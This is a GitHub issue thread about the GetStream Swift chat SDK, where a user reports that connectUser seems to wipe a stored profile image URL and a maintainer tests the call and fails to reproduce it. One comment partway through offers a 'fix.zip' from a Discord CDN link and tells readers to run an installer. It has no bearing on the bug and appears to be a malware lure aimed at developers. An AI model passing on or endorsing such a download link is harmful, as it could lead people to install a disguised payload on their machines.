### ISSUE TITLE
ImageUrl is removed on database when call UserConnect

### ISSUE THREAD

**Issue by ikaru19** [GetStream/stream-chat-swift#3403]
## What did you do?
everytime i call the connectUser using this code,
```swift
ChatClient.shared.connectUser(
  userInfo: .init(id: data.id),
  token: data.getToken()
 )
```
it will remove the imageURL but not the extraData and the name, is it expected behavior to remove the imageURL if we not set the data ?
## What did you expect to happen?
can we just call the connectUser by id without removing any data on stream database?

## What happened instead?
If i call just using the UserID it will remove the image, but not the name field and extraData field

## GetStream Environment
**GetStream Chat version:*4.62.0*
**GetStream Chat frameworks:** StreamChat, StreamChatUI
**iOS version:*17*
**Swift version:**
**Xcode version:**
**Device:**

**Comment by maher-nakesh** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by laevandus** [comment]
Hi @ikaru19,

I have investigated your report and I can verify that `connectUser` does not reset the image.

I verified with this example snippet:
```
let connectedUser = try await ChatClient.shared.connectUser(
                            userInfo: UserInfo(id: "tvahter"),
                            token: "<redacted>"
)
print(connectedUser.state.user.imageURL) // url is printed from previous sessions
```
where
```
extension ChatClient {
    static let shared: ChatClient = {
        let apiKeyString = "redacted"
        let config = ChatClientConfig(apiKey: .init(apiKeyString))
        return ChatClient(config: config)
    }()
}
```

Could you please verify that the image url using the Stream's chat explorer. Open https://getstream.io, log in, open the dashboard, find your app, chat messaging, and then explorer. There you can see the currently stored data. Looking up the user and checking its image field should reveal the image URL. Is it set there? How do you check the image URL on the client side?

If this does not help, it is best to reach out to our [support](https://getstream.io/contact/support/), and we can investigate this further in more detail then.

Thank you,
Toomas

**Comment by laevandus** [comment]
Hi @ikaru19,

I can see we have a support ticket open about this. Let's continue our investigation there. I'll close the public issue here.

Thank you!
